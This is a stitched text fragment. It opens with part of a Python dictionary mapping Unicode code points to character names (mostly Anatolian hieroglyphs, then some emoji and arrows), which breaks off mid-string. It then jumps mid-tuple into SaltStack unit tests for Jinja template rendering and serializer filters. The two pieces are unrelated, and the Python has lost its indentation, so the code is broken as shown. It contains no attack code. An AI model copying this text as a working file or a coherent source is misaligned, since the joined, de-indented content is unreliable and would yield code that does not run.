83163: 'ANATOLIAN HIEROGLYPH A192',
83164: 'ANATOLIAN HIEROGLYPH A193',
83165: 'ANATOLIAN HIEROGLYPH A194',
83166: 'ANATOLIAN HIEROGLYPH A195',
83167: 'ANATOLIAN HIEROGLYPH A196',
83168: 'ANATOLIAN HIEROGLYPH A197',
83169: 'ANATOLIAN HIEROGLYPH A198',
83170: 'ANATOLIAN HIEROGLYPH A199',
83171: 'ANATOLIAN HIEROGLYPH A200',
83172: 'ANATOLIAN HIEROGLYPH A201',
83173: 'ANATOLIAN HIEROGLYPH A202',
83174: 'ANATOLIAN HIEROGLYPH A202A',
83175: 'ANATOLIAN HIEROGLYPH A202B',
83176: 'ANATOLIAN HIEROGLYPH A203',
83177: 'ANATOLIAN HIEROGLYPH A204',
83178: 'ANATOLIAN HIEROGLYPH A205',
83179: 'ANATOLIAN HIEROGLYPH A206',
83180: 'ANATOLIAN HIEROGLYPH A207',
83181: 'ANATOLIAN HIEROGLYPH A207A',
83182: 'ANATOLIAN HIEROGLYPH A208',
83183: 'ANATOLIAN HIEROGLYPH A209',
83184: 'ANATOLIAN HIEROGLYPH A209A',
83185: 'ANATOLIAN HIEROGLYPH A210',
83186: 'ANATOLIAN HIEROGLYPH A211',
83187: 'ANATOLIAN HIEROGLYPH A212',
83188: 'ANATOLIAN HIEROGLYPH A213',
83189: 'ANATOLIAN HIEROGLYPH A214',
83190: 'ANATOLIAN HIEROGLYPH A215',
83191: 'ANATOLIAN HIEROGLYPH A215A',
83192: 'ANATOLIAN HIEROGLYPH A216',
83193: 'ANATOLIAN HIEROGLYPH A216A',
83194: 'ANATOLIAN HIEROGLYPH A217',
83195: 'ANATOLIAN HIEROGLYPH A218',
83196: 'ANATOLIAN HIEROGLYPH A219',
83197: 'ANATOLIAN HIEROGLYPH A220',
83198: 'ANATOLIAN HIEROGLYPH A221',
83199: 'ANATOLIAN HIEROGLYPH A222',
83200: 'ANATOLIAN HIEROGLYPH A223',
83201: 'ANATOLIAN HIEROGLYPH A224',
83202: 'ANATOLIAN HIEROGLYPH A225',
83203: 'ANATOLIAN HIEROGLYPH A226',
83204: 'ANATOLIAN HIEROGLYPH A227',
83205: 'ANATOLIAN HIEROGLYPH A227A',
83206: 'ANATOLIAN HIEROGLYPH A228',
83207: 'ANATOLIAN HIEROGLYPH A229',
83208: 'ANATOLIAN HIEROGLYPH A230',
83209: 'ANATOLIAN HIEROGLYPH A231',
83210: 'ANATOLIAN HIEROGLYPH A232',
83211: 'ANATOLIAN HIEROGLYPH A233',
83212: 'ANATOLIAN HIEROGLYPH A234',
83213: 'ANATOLIAN HIEROGLYPH A235',
83214: 'ANATOLIAN HIEROGLYPH A236',
83215: 'ANATOLIAN HIEROGLYPH A237',
83216: 'ANATOLIAN HIEROGLYPH A238',
83217: 'ANATOLIAN HIEROGLYPH A239',
83218: 'ANATOLIAN HIEROGLYPH A240',
83219: 'ANATOLIAN HIEROGLYPH A241',
83220: 'ANATOLIAN HIEROGLYPH A242',
83221: 'ANATOLIAN HIEROGLYPH A243',
83222: 'ANATOLIAN HIEROGLYPH A244',
83223: 'ANATOLIAN HIEROGLYPH A245',
83224: 'ANATOLIAN HIEROGLYPH A246',
83225: 'ANATOLIAN HIEROGLYPH A247',
83226: 'ANATOLIAN HIEROGLYPH A248',
83227: 'ANATOLIAN HIEROGLYPH A249',
83228: 'ANATOLIAN HIEROGLYPH A250',
83229: 'ANATOLIAN HIEROGLYPH A251',
83230: 'ANATOLIAN HIEROGLYPH A252',
83231: 'ANATOLIAN HIEROGLYPH A253',
83232: 'ANATOLIAN HIEROGLYPH A254',
83233: 'ANATOLIAN HIEROGLYPH A255',
83234: 'ANATOLIAN HIEROGLYPH A256',
83235: 'ANATOLIAN HIEROGLYPH A257',
83236: 'ANATOLIAN HIEROGLYPH A258',
83237: 'ANATOLIAN HIEROGLYPH A259',
83238: 'ANATOLIAN HIEROGLYPH A260',
83239: 'ANATOLIAN HIEROGLYPH A261',
83240: 'ANATOLIAN HIEROGLYPH A262',
83241: 'ANATOLIAN HIEROGLYPH A263',
83242: 'ANATOLIAN HIEROGLYPH A264',
83243: 'ANATOLIAN HIEROGLYPH A265',
83244: 'ANATOLIAN HIEROGLYPH A266',
83245: 'ANATOLIAN HIEROGLYPH A267',
83246: 'ANATOLIAN HIEROGLYPH A267A',
83247: 'ANATOLIAN HIEROGLYPH A268',
83248: 'ANATOLIAN HIEROGLYPH A269',
83249: 'ANATOLIAN HIEROGLYPH A270',
83250: 'ANATOLIAN HIEROGLYPH A271',
83251: 'ANATOLIAN HIEROGLYPH A272',
83252: 'ANATOLIAN HIEROGLYPH A273',
83253: 'ANATOLIAN HIEROGLYPH A274',
83254: 'ANATOLIAN HIEROGLYPH A275',
83255: 'ANATOLIAN HIEROGLYPH A276',
83256: 'ANATOLIAN HIEROGLYPH A277',
83257: 'ANATOLIAN HIEROGLYPH A278',
83258: 'ANATOLIAN HIEROGLYPH A279',
83259: 'ANATOLIAN HIEROGLYPH A280',
83260: 'ANATOLIAN HIEROGLYPH A281',
83261: 'ANATOLIAN HIEROGLYPH A282',
83262: 'ANATOLIAN HIEROGLYPH A283',
83263: 'ANATOLIAN HIEROGLYPH A284',
83264: 'ANATOLIAN HIEROGLYPH A285',
83265: 'ANATOLIAN HIEROGLYPH A286',
83266: 'ANATOLIAN HIEROGLYPH A287',
83267: 'ANATOLIAN HIEROGLYPH A288',
83268: 'ANATOLIAN HIEROGLYPH A289',
83269: 'ANATOLIAN HIEROGLYPH A289A',
83270: 'ANATOLIAN HIEROGLYPH A290',
83271: 'ANATOLIAN HIEROGLYPH A291',
83272: 'ANATOLIAN HIEROGLYPH A292',
83273: 'ANATOLIAN HIEROGLYPH A293',
83274: 'ANATOLIAN HIEROGLYPH A294',
83275: 'ANATOLIAN HIEROGLYPH A294A',
83276: 'ANATOLIAN HIEROGLYPH A295',
83277: 'ANATOLIAN HIEROGLYPH A296',
83278: 'ANATOLIAN HIEROGLYPH A297',
83279: 'ANATOLIAN HIEROGLYPH A298',
83280: 'ANATOLIAN HIEROGLYPH A299',
83281: 'ANATOLIAN HIEROGLYPH A299A',
83282: 'ANATOLIAN HIEROGLYPH A300',
83283: 'ANATOLIAN HIEROGLYPH A301',
83284: 'ANATOLIAN HIEROGLYPH A302',
83285: 'ANATOLIAN HIEROGLYPH A303',
83286: 'ANATOLIAN HIEROGLYPH A304',
83287: 'ANATOLIAN HIEROGLYPH A305',
83288: 'ANATOLIAN HIEROGLYPH A306',
83289: 'ANATOLIAN HIEROGLYPH A307',
83290: 'ANATOLIAN HIEROGLYPH A308',
83291: 'ANATOLIAN HIEROGLYPH A309',
83292: 'ANATOLIAN HIEROGLYPH A309A',
83293: 'ANATOLIAN HIEROGLYPH A310',
83294: 'ANATOLIAN HIEROGLYPH A311',
83295: 'ANATOLIAN HIEROGLYPH A312',
83296: 'ANATOLIAN HIEROGLYPH A313',
83297: 'ANATOLIAN HIEROGLYPH A314',
83298: 'ANATOLIAN HIEROGLYPH A315',
83299: 'ANATOLIAN HIEROGLYPH A316',
83300: 'ANATOLIAN HIEROGLYPH A317',
83301: 'ANATOLIAN HIEROGLYPH A318',
83302: 'ANATOLIAN HIEROGLYPH A319',
83303: 'ANATOLIAN HIEROGLYPH A320',
83304: 'ANATOLIAN HIEROGLYPH A321',
83305: 'ANATOLIAN HIEROGLYPH A322',
83306: 'ANATOLIAN HIEROGLYPH A323',
83307: 'ANATOLIAN HIEROGLYPH A324',
83308: 'ANATOLIAN HIEROGLYPH A325',
83309: 'ANATOLIAN HIEROGLYPH A326',
83310: 'ANATOLIAN HIEROGLYPH A327',
83311: 'ANATOLIAN HIEROGLYPH A328',
83312: 'ANATOLIAN HIEROGLYPH A329',
83313: 'ANATOLIAN HIEROGLYPH A329A',
83314: 'ANATOLIAN HIEROGLYPH A330',
83315: 'ANATOLIAN HIEROGLYPH A331',
83316: 'ANATOLIAN HIEROGLYPH A332A',
83317: 'ANATOLIAN HIEROGLYPH A332B',
83318: 'ANATOLIAN HIEROGLYPH A332C',
83319: 'ANATOLIAN HIEROGLYPH A333',
83320: 'ANATOLIAN HIEROGLYPH A334',
83321: 'ANATOLIAN HIEROGLYPH A335',
83322: 'ANATOLIAN HIEROGLYPH A336',
83323: 'ANATOLIAN HIEROGLYPH A336A',
83324: 'ANATOLIAN HIEROGLYPH A336B',
83325: 'ANATOLIAN HIEROGLYPH A336C',
83326: 'ANATOLIAN HIEROGLYPH A337',
83327: 'ANATOLIAN HIEROGLYPH A338',
83328: 'ANATOLIAN HIEROGLYPH A339',
83329: 'ANATOLIAN HIEROGLYPH A340',
83330: 'ANATOLIAN HIEROGLYPH A341',
83331: 'ANATOLIAN HIEROGLYPH A342',
83332: 'ANATOLIAN HIEROGLYPH A343',
83333: 'ANATOLIAN HIEROGLYPH A344',
83334: 'ANATOLIAN HIEROGLYPH A345',
83335: 'ANATOLIAN HIEROGLYPH A346',
83336: 'ANATOLIAN HIEROGLYPH A347',
83337: 'ANATOLIAN HIEROGLYPH A348',
83338: 'ANATOLIAN HIEROGLYPH A349',
83339: 'ANATOLIAN HIEROGLYPH A350',
83340: 'ANATOLIAN HIEROGLYPH A351',
83341: 'ANATOLIAN HIEROGLYPH A352',
83342: 'ANATOLIAN HIEROGLYPH A353',
83343: 'ANATOLIAN HIEROGLYPH A354',
83344: 'ANATOLIAN HIEROGLYPH A355',
83345: 'ANATOLIAN HIEROGLYPH A356',
83346: 'ANATOLIAN HIEROGLYPH A357',
83347: 'ANATOLIAN HIEROGLYPH A358',
83348: 'ANATOLIAN HIEROGLYPH A359',
83349: 'ANATOLIAN HIEROGLYPH A359A',
83350: 'ANATOLIAN HIEROGLYPH A360',
83351: 'ANATOLIAN HIEROGLYPH A361',
83352: 'ANATOLIAN HIEROGLYPH A362',
83353: 'ANATOLIAN HIEROGLYPH A363',
83354: 'ANATOLIAN HIEROGLYPH A364',
83355: 'ANATOLIAN HIEROGLYPH A364A',
83356: 'ANATOLIAN HIEROGLYPH A365',
83357: 'ANATOLIAN HIEROGLYPH A366',
83358: 'ANATOLIAN HIEROGLYPH A367',
83359: 'ANATOLIAN HIEROGLYPH A368',
83360: 'ANATOLIAN HIEROGLYPH A368A',
83361: 'ANATOLIAN HIEROGLYPH A369',
83362: 'ANATOLIAN HIEROGLYPH A370',
83363: 'ANATOLIAN HIEROGLYPH A371',
83364: 'ANATOLIAN HIEROGLYPH A371A',
83365: 'ANATOLIAN HIEROGLYPH A372',
83366: 'ANATOLIAN HIEROGLYPH A373',
83367: 'ANATOLIAN HIEROGLYPH A374',
83368: 'ANATOLIAN HIEROGLYPH A375',
83369: 'ANATOLIAN HIEROGLYPH A376',
83370: 'ANATOLIAN HIEROGLYPH A377',
83371: 'ANATOLIAN HIEROGLYPH A378',
83372: 'ANATOLIAN HIEROGLYPH A379',
83373: 'ANATOLIAN HIEROGLYPH A380',
83374: 'ANATOLIAN HIEROGLYPH A381',
83375: 'ANATOLIAN HIEROGLYPH A381A',
83376: 'ANATOLIAN HIEROGLYPH A382',
83377: 'ANATOLIAN HIEROGLYPH A383 RA OR RI',
83378: 'ANATOLIAN HIEROGLYPH A383A',
83379: 'ANATOLIAN HIEROGLYPH A384',
83380: 'ANATOLIAN HIEROGLYPH A385',
83381: 'ANATOLIAN HIEROGLYPH A386',
83382: 'ANATOLIAN HIEROGLYPH A386A',
83383: 'ANATOLIAN HIEROGLYPH A387',
83384: 'ANATOLIAN HIEROGLYPH A388',
83385: 'ANATOLIAN HIEROGLYPH A389',
83386: 'ANATOLIAN HIEROGLYPH A390',
83387: 'ANATOLIAN HIEROGLYPH A391',
83388: 'ANATOLIAN HIEROGLYPH A392',
83389: 'ANATOLIAN HIEROGLYPH A393 EIGHT',
83390: 'ANATOLIAN HIEROGLYPH A394',
83391: 'ANATOLIAN HIEROGLYPH A395',
83392: 'ANATOLIAN HIEROGLYPH A396',
83393: 'ANATOLIAN HIEROGLYPH A397',
83394: 'ANATOLIAN HIEROGLYPH A398',
83395: 'ANATOLIAN HIEROGLYPH A399',
83396: 'ANATOLIAN HIEROGLYPH A400',
83397: 'ANATOLIAN HIEROGLYPH A401',
83398: 'ANATOLIAN HIEROGLYPH A402',
83399: 'ANATOLIAN HIEROGLYPH A403',
83400: 'ANATOLIAN HIEROGLYPH A404',
83401: 'ANATOLIAN HIEROGLYPH A405',
83402: 'ANATOLIAN HIEROGLYPH A406',
83403: 'ANATOLIAN HIEROGLYPH A407',
83404: 'ANATOLIAN HIEROGLYPH A408',
83405: 'ANATOLIAN HIEROGLYPH A409',
83406: 'ANATOLIAN HIEROGLYPH A410 BEGIN LOGOGRAM MARK',
83407: 'ANATOLIAN HIEROGLYPH A410A END LOGOGRAM MARK',
83408: 'ANATOLIAN HIEROGLYPH A411',
83409: 'ANATOLIAN HIEROGLYPH A412',
83410: 'ANATOLIAN HIEROGLYPH A413',
83411: 'ANATOLIAN HIEROGLYPH A414',
83412: 'ANATOLIAN HIEROGLYPH A415',
83413: 'ANATOLIAN HIEROGLYPH A416',
83414: 'ANATOLIAN HIEROGLYPH A417',
83415: 'ANATOLIAN HIEROGLYPH A418',
83416: 'ANATOLIAN HIEROGLYPH A419',
83417: 'ANATOLIAN HIEROGLYPH A420',
83418: 'ANATOLIAN HIEROGLYPH A421',
83419: 'ANATOLIAN HIEROGLYPH A422',
83420: 'ANATOLIAN HIEROGLYPH A423',
83421: 'ANATOLIAN HIEROGLYPH A424',
83422: 'ANATOLIAN HIEROGLYPH A425',
83423: 'ANATOLIAN HIEROGLYPH A426',
83424: 'ANATOLIAN HIEROGLYPH A427',
83425: 'ANATOLIAN HIEROGLYPH A428',
83426: 'ANATOLIAN HIEROGLYPH A429',
83427: 'ANATOLIAN HIEROGLYPH A430',
83428: 'ANATOLIAN HIEROGLYPH A431',
83429: 'ANATOLIAN HIEROGLYPH A432',
83430: 'ANATOLIAN HIEROGLYPH A433',
83431: 'ANATOLIAN HIEROGLYPH A434',
83432: 'ANATOLIAN HIEROGLYPH A435',
83433: 'ANATOLIAN HIEROGLYPH A436',
83434: 'ANATOLIAN HIEROGLYPH A437',
83435: 'ANATOLIAN HIEROGLYPH A438',
83436: 'ANATOLIAN HIEROGLYPH A439',
83437: 'ANATOLIAN HIEROGLYPH A440',
83438: 'ANATOLIAN HIEROGLYPH A441',
83439: 'ANATOLIAN HIEROGLYPH A442',
83440: 'ANATOLIAN HIEROGLYPH A443',
83441: 'ANATOLIAN HIEROGLYPH A444',
83442: 'ANATOLIAN HIEROGLYPH A445',
83443: 'ANATOLIAN HIEROGLYPH A446',
83444: 'ANATOLIAN HIEROGLYPH A447',
83445: 'ANATOLIAN HIEROGLYPH A448',
83446: 'ANATOLIAN HIEROGLYPH A449',
83447: 'ANATOLIAN HIEROGLYPH A450',
83448: 'ANATOLIAN HIEROGLYPH A450A',
83449: 'ANATOLIAN HIEROGLYPH A451',
83450: 'ANATOLIAN HIEROGLYPH A452',
83451: 'ANATOLIAN HIEROGLYPH A453',
83452: 'ANATOLIAN HIEROGLYPH A454',
83453: 'ANATOLIAN HIEROGLYPH A455',
83454: 'ANATOLIAN HIEROGLYPH A456',
83455: 'ANATOLIAN HIEROGLYPH A457',
83456: 'ANATOLIAN HIEROGLYPH A457A',
83457: 'ANATOLIAN HIEROGLYPH A458',
83458: 'ANATOLIAN HIEROGLYPH A459',
83459: 'ANATOLIAN HIEROGLYPH A460',
83460: 'ANATOLIAN HIEROGLYPH A461',
83461: 'ANATOLIAN HIEROGLYPH A462',
83462: 'ANATOLIAN HIEROGLYPH A463',
83463: 'ANATOLIAN HIEROGLYPH A464',
83464: 'ANATOLIAN HIEROGLYPH A465',
83465: 'ANATOLIAN HIEROGLYPH A466',
83466: 'ANATOLIAN HIEROGLYPH A467',
83467: 'ANATOLIAN HIEROGLYPH A468',
83468: 'ANATOLIAN HIEROGLYPH A469',
83469: 'ANATOLIAN HIEROGLYPH A470',
83470: 'ANATOLIAN HIEROGLYPH A471',
83471: 'ANATOLIAN HIEROGLYPH A472',
83472: 'ANATOLIAN HIEROGLYPH A473',
83473: 'ANATOLIAN HIEROGLYPH A474',
83474: 'ANATOLIAN HIEROGLYPH A475',
83475: 'ANATOLIAN HIEROGLYPH A476',
83476: 'ANATOLIAN HIEROGLYPH A477',
83477: 'ANATOLIAN HIEROGLYPH A478',
83478: 'ANATOLIAN HIEROGLYPH A479',
83479: 'ANATOLIAN HIEROGLYPH A480',
83480: 'ANATOLIAN HIEROGLYPH A481',
83481: 'ANATOLIAN HIEROGLYPH A482',
83482: 'ANATOLIAN HIEROGLYPH A483',
83483: 'ANATOLIAN HIEROGLYPH A484',
83484: 'ANATOLIAN HIEROGLYPH A485',
83485: 'ANATOLIAN HIEROGLYPH A486',
83486: 'ANATOLIAN HIEROGLYPH A487',
83487: 'ANATOLIAN HIEROGLYPH A488',
83488: 'ANATOLIAN HIEROGLYPH A489',
83489: 'ANATOLIAN HIEROGLYPH A490',
83490: 'ANATOLIAN HIEROGLYPH A491',
83491: 'ANATOLIAN HIEROGLYPH A492',
83492: 'ANATOLIAN HIEROGLYPH A493',
83493: 'ANATOLIAN HIEROGLYPH A494',
83494: 'ANATOLIAN HIEROGLYPH A495',
83495: 'ANATOLIAN HIEROGLYPH A496',
83496: 'ANATOLIAN HIEROGLYPH A497',
83497: 'ANATOLIAN HIEROGLYPH A501',
83498: 'ANATOLIAN HIEROGLYPH A502',
83499: 'ANATOLIAN HIEROGLYPH A503',
83500: 'ANATOLIAN HIEROGLYPH A504',
83501: 'ANATOLIAN HIEROGLYPH A505',
83502: 'ANATOLIAN HIEROGLYPH A506',
83503: 'ANATOLIAN HIEROGLYPH A507',
83504: 'ANATOLIAN HIEROGLYPH A508',
83505: 'ANATOLIAN HIEROGLYPH A509',
83506: 'ANATOLIAN HIEROGLYPH A510',
83507: 'ANATOLIAN HIEROGLYPH A511',
83508: 'ANATOLIAN HIEROGLYPH A512',
83509: 'ANATOLIAN HIEROGLYPH A513',
83510: 'ANATOLIAN HIEROGLYPH A514',
83511: 'ANATOLIAN HIEROGLYPH A515',
83512: 'ANATOLIAN HIEROGLYPH A516',
83513: 'ANATOLIAN HIEROGLYPH A517',
83514: 'ANATOLIAN HIEROGLYPH A518',
83515: 'ANATOLIAN HIEROGLYPH A519',
83516: 'ANATOLIAN HIEROGLYPH A520',
83517: 'ANATOLIAN HIEROGLYPH A521',
83518: 'ANATOLIAN HIEROGLYPH A522',
83519: 'ANATOLIAN HIEROGLYPH A523',
83520: 'ANATOLIAN HIEROGLYPH A524',
83521: 'ANATOLIAN HIEROGLYPH A525',
83522: 'ANATOLIAN HIEROGLYPH A526',
83523: 'ANATOLIAN HIEROGLYPH A527',
83524: 'ANATOLIAN HIEROGLYPH A528',
83525: 'ANATOLIAN HIEROGLYPH A529',
83526: 'ANATOLIAN HIEROGLYPH A530',
128162: 'ANGER SYMBOL',
128544: 'ANGRY FACE',
128551: 'ANGUISHED FACE',
128028: 'ANT',
128246: 'ANTENNA WITH BARS',
128260: 'ANTICLOCKWISE DOWNWARDS AND UPWARDS OPEN CIRCLE ARROWS',
11149: 'ANTICLOCKWISE TRIANGLE-HEADED BOTTOM U-SHAPED ARROW',
11150: 'ANTICLOCKWISE TRIANGLE-HEADED LEFT U-SHAPED ARROW',
11119: 'ANTICLOCKWISE TRIANGLE-HEADED OPEN CIRCLE | |
1040814000,
"1040814000",
)
for object in objects:
response = render_jinja_tmpl(
"{{ object|strftime }}",
dict(
object=object,
opts=self.local_opts,
saltenv="test",
salt=self.local_salt,
),
)
self.assertEqual(response, "2002-12-25")
response = render_jinja_tmpl(
'{{ object|strftime("%b %d, %Y") }}',
dict(
object=object,
opts=self.local_opts,
saltenv="test",
salt=self.local_salt,
),
)
self.assertEqual(response, "Dec 25, 2002")
response = render_jinja_tmpl(
'{{ object|strftime("%y") }}',
dict(
object=object,
opts=self.local_opts,
saltenv="test",
salt=self.local_salt,
),
)
self.assertEqual(response, "02")
def test_non_ascii(self):
fn = os.path.join(self.template_dir, "non_ascii")
out = JINJA(fn, opts=self.local_opts, saltenv="test", salt=self.local_salt)
with salt.utils.files.fopen(out["data"], "rb") as fp:
result = salt.utils.stringutils.to_unicode(fp.read(), "utf-8")
self.assertEqual(
salt.utils.stringutils.to_unicode("Assunção" + os.linesep), result
)
def test_get_context_has_enough_context(self):
template = "1\n2\n3\n4\n5\n6\n7\n8\n9\na\nb\nc\nd\ne\nf"
context = salt.utils.stringutils.get_context(template, 8)
expected = "---\n[...]\n3\n4\n5\n6\n7\n8\n9\na\nb\nc\nd\n[...]\n---"
self.assertEqual(expected, context)
def test_get_context_at_top_of_file(self):
template = "1\n2\n3\n4\n5\n6\n7\n8\n9\na\nb\nc\nd\ne\nf"
context = salt.utils.stringutils.get_context(template, 1)
expected = "---\n1\n2\n3\n4\n5\n6\n[...]\n---"
self.assertEqual(expected, context)
def test_get_context_at_bottom_of_file(self):
template = "1\n2\n3\n4\n5\n6\n7\n8\n9\na\nb\nc\nd\ne\nf"
context = salt.utils.stringutils.get_context(template, 15)
expected = "---\n[...]\na\nb\nc\nd\ne\nf\n---"
self.assertEqual(expected, context)
def test_get_context_2_context_lines(self):
template = "1\n2\n3\n4\n5\n6\n7\n8\n9\na\nb\nc\nd\ne\nf"
context = salt.utils.stringutils.get_context(template, 8, num_lines=2)
expected = "---\n[...]\n6\n7\n8\n9\na\n[...]\n---"
self.assertEqual(expected, context)
def test_get_context_with_marker(self):
template = "1\n2\n3\n4\n5\n6\n7\n8\n9\na\nb\nc\nd\ne\nf"
context = salt.utils.stringutils.get_context(
template, 8, num_lines=2, marker=" <---"
)
expected = "---\n[...]\n6\n7\n8 <---\n9\na\n[...]\n---"
self.assertEqual(expected, context)
def test_render_with_syntax_error(self):
template = "hello\n\n{{ bad\n\nfoo"
expected = r".*---\nhello\n\n{{ bad\n\nfoo <======================\n---"
self.assertRaisesRegex(
SaltRenderError,
expected,
render_jinja_tmpl,
template,
dict(opts=self.local_opts, saltenv="test", salt=self.local_salt),
)
@skipIf(six.PY3, "Not applicable to Python 3")
def test_render_with_unicode_syntax_error(self):
with patch.object(builtins, "__salt_system_encoding__", "utf-8"):
template = "hello\n\n{{ bad\n\nfoo한"
expected = r".*---\nhello\n\n{{ bad\n\nfoo\xed\x95\x9c <======================\n---"
self.assertRaisesRegex(
SaltRenderError,
expected,
render_jinja_tmpl,
template,
dict(opts=self.local_opts, saltenv="test", salt=self.local_salt),
)
def test_render_with_utf8_syntax_error(self):
with patch.object(builtins, "__salt_system_encoding__", "utf-8"):
template = "hello\n\n{{ bad\n\nfoo한"
expected = salt.utils.stringutils.to_str(
r".*---\nhello\n\n{{ bad\n\nfoo한 <======================\n---"
)
self.assertRaisesRegex(
SaltRenderError,
expected,
render_jinja_tmpl,
template,
dict(opts=self.local_opts, saltenv="test", salt=self.local_salt),
)
def test_render_with_undefined_variable(self):
template = "hello\n\n{{ foo }}\n\nfoo"
expected = r"Jinja variable \'foo\' is undefined"
self.assertRaisesRegex(
SaltRenderError,
expected,
render_jinja_tmpl,
template,
dict(opts=self.local_opts, saltenv="test", salt=self.local_salt),
)
def test_render_with_undefined_variable_utf8(self):
template = "hello\xed\x95\x9c\n\n{{ foo }}\n\nfoo"
expected = r"Jinja variable \'foo\' is undefined"
self.assertRaisesRegex(
SaltRenderError,
expected,
render_jinja_tmpl,
template,
dict(opts=self.local_opts, saltenv="test", salt=self.local_salt),
)
def test_render_with_undefined_variable_unicode(self):
template = "hello한\n\n{{ foo }}\n\nfoo"
expected = r"Jinja variable \'foo\' is undefined"
self.assertRaisesRegex(
SaltRenderError,
expected,
render_jinja_tmpl,
template,
dict(opts=self.local_opts, saltenv="test", salt=self.local_salt),
)
class TestJinjaDefaultOptions(TestCase):
def __init__(self, *args, **kws):
TestCase.__init__(self, *args, **kws)
self.local_opts = {
"cachedir": os.path.join(RUNTIME_VARS.TMP, "jinja-template-cache"),
"file_buffer_size": 1048576,
"file_client": "local",
"file_ignore_regex": None,
"file_ignore_glob": None,
"file_roots": {
"test": [os.path.join(RUNTIME_VARS.BASE_FILES, "templates")]
},
"pillar_roots": {
"test": [os.path.join(RUNTIME_VARS.BASE_FILES, "templates")]
},
"fileserver_backend": ["roots"],
"hash_type": "md5",
"extension_modules": os.path.join(
os.path.dirname(os.path.abspath(__file__)), "extmods"
),
"jinja_env": {"line_comment_prefix": "##", "line_statement_prefix": "%"},
}
self.local_salt = {
"myvar": "zero",
"mylist": [0, 1, 2, 3],
}
def test_comment_prefix(self):
template = """
%- set myvar = 'one'
## ignored comment 1
{{- myvar -}}
{%- set myvar = 'two' %} ## ignored comment 2
{{- myvar }} ## ignored comment 3
%- if myvar == 'two':
%- set myvar = 'three'
%- endif
{{- myvar -}}
"""
rendered = render_jinja_tmpl(
template, dict(opts=self.local_opts, saltenv="test", salt=self.local_salt)
)
self.assertEqual(rendered, "onetwothree")
def test_statement_prefix(self):
template = """
{%- set mylist = ['1', '2', '3'] %}
%- set mylist = ['one', 'two', 'three']
%- for item in mylist:
{{- item }}
%- endfor
"""
rendered = render_jinja_tmpl(
template, dict(opts=self.local_opts, saltenv="test", salt=self.local_salt)
)
self.assertEqual(rendered, "onetwothree")
class TestCustomExtensions(TestCase):
def __init__(self, *args, **kws):
super(TestCustomExtensions, self).__init__(*args, **kws)
self.local_opts = {
"cachedir": os.path.join(RUNTIME_VARS.TMP, "jinja-template-cache"),
"file_buffer_size": 1048576,
"file_client": "local",
"file_ignore_regex": None,
"file_ignore_glob": None,
"file_roots": {
"test": [os.path.join(RUNTIME_VARS.BASE_FILES, "templates")]
},
"pillar_roots": {
"test": [os.path.join(RUNTIME_VARS.BASE_FILES, "templates")]
},
"fileserver_backend": ["roots"],
"hash_type": "md5",
"extension_modules": os.path.join(
os.path.dirname(os.path.abspath(__file__)), "extmods"
),
}
self.local_salt = {
# 'dns.A': dnsutil.A,
# 'dns.AAAA': dnsutil.AAAA,
# 'file.exists': filemod.file_exists,
# 'file.basename': filemod.basename,
# 'file.dirname': filemod.dirname
}
def test_regex_escape(self):
dataset = "foo?:.*/\\bar"
env = Environment(extensions=[SerializerExtension])
env.filters.update(JinjaFilter.salt_jinja_filters)
rendered = env.from_string("{{ dataset|regex_escape }}").render(dataset=dataset)
self.assertEqual(rendered, re.escape(dataset))
def test_unique_string(self):
dataset = "foo"
unique = set(dataset)
env = Environment(extensions=[SerializerExtension])
env.filters.update(JinjaFilter.salt_jinja_filters)
if six.PY3:
rendered = (
env.from_string("{{ dataset|unique }}")
.render(dataset=dataset)
.strip("'{}")
.split("', '")
)
self.assertEqual(sorted(rendered), sorted(list(unique)))
else:
rendered = env.from_string("{{ dataset|unique }}").render(dataset=dataset)
self.assertEqual(rendered, "{0}".format(unique))
def test_unique_tuple(self):
dataset = ("foo", "foo", "bar")
unique = set(dataset)
env = Environment(extensions=[SerializerExtension])
env.filters.update(JinjaFilter.salt_jinja_filters)
if six.PY3:
rendered = (
env.from_string("{{ dataset|unique }}")
.render(dataset=dataset)
.strip("'{}")
.split("', '")
)
self.assertEqual(sorted(rendered), sorted(list(unique)))
else:
rendered = env.from_string("{{ dataset|unique }}").render(dataset=dataset)
self.assertEqual(rendered, "{0}".format(unique))
def test_unique_list(self):
dataset = ["foo", "foo", "bar"]
unique = ["foo", "bar"]
env = Environment(extensions=[SerializerExtension])
env.filters.update(JinjaFilter.salt_jinja_filters)
if six.PY3:
rendered = (
env.from_string("{{ dataset|unique }}")
.render(dataset=dataset)
.strip("'[]")
.split("', '")
)
self.assertEqual(rendered, unique)
else:
rendered = env.from_string("{{ dataset|unique }}").render(dataset=dataset)
self.assertEqual(rendered, "{0}".format(unique))
def test_serialize_json(self):
dataset = {"foo": True, "bar": 42, "baz": [1, 2, 3], "qux": 2.0}
env = Environment(extensions=[SerializerExtension])
rendered = env.from_string("{{ dataset|json }}").render(dataset=dataset)
self.assertEqual(dataset, salt.utils.json.loads(rendered))
def test_serialize_yaml(self):
dataset = {
"foo": True,
"bar": 42,
"baz": [1, 2, 3],
"qux": 2.0,
"spam": OrderedDict([("foo", OrderedDict([("bar", "baz"), ("qux", 42)]))]),
}
env = Environment(extensions=[SerializerExtension])
rendered = env.from_string("{{ dataset|yaml }}").render(dataset=dataset)
self.assertEqual(dataset, salt.utils.yaml.safe_load(rendered))
def test_serialize_yaml_str(self):
dataset = "str value"
env = Environment(extensions=[SerializerExtension])
rendered = env.from_string("{{ dataset|yaml }}").render(dataset=dataset)
self.assertEqual(dataset, rendered)
def test_serialize_yaml_unicode(self):
dataset = "str value"
env = Environment(extensions=[SerializerExtension])
rendered = env.from_string("{{ dataset|yaml }}").render(dataset=dataset)
if six.PY3:
self.assertEqual("str value", rendered)
else:
# Due to a bug in the equality handler, this check needs to be split
# up into several different assertions. We need to check that the various
# string segments are present in the rendered value, as well as the
# type of the rendered variable (should be unicode, which is the same as
# six.text_type). This should cover all use cases but also allow the test
# to pass on CentOS 6 running Python 2.7.
self.assertIn("str value", rendered)
self.assertIsInstance(rendered, six.text_type)
def test_serialize_python(self):
dataset = {"foo": True, "bar": 42, "baz": [1, 2, 3], "qux": 2.0}
env = Environment(extensions=[SerializerExtension])
rendered = env.from_string("{{ dataset|python }}").render(dataset=dataset)
self.assertEqual(rendered, pprint.pformat(dataset))
def test_load_yaml(self):
env = Environment(extensions=[SerializerExtension])
rendered = env.from_string(
'{% set document = "{foo: it works}"|load_yaml %}{{ document.foo }}'
).render()
self.assertEqual(rendered, "it works")
rendered = env.from_string(
"{% set document = document|load_yaml %}" "{{ document.foo }}"
).render(document="{foo: it works}")
self.assertEqual(rendered, "it works")
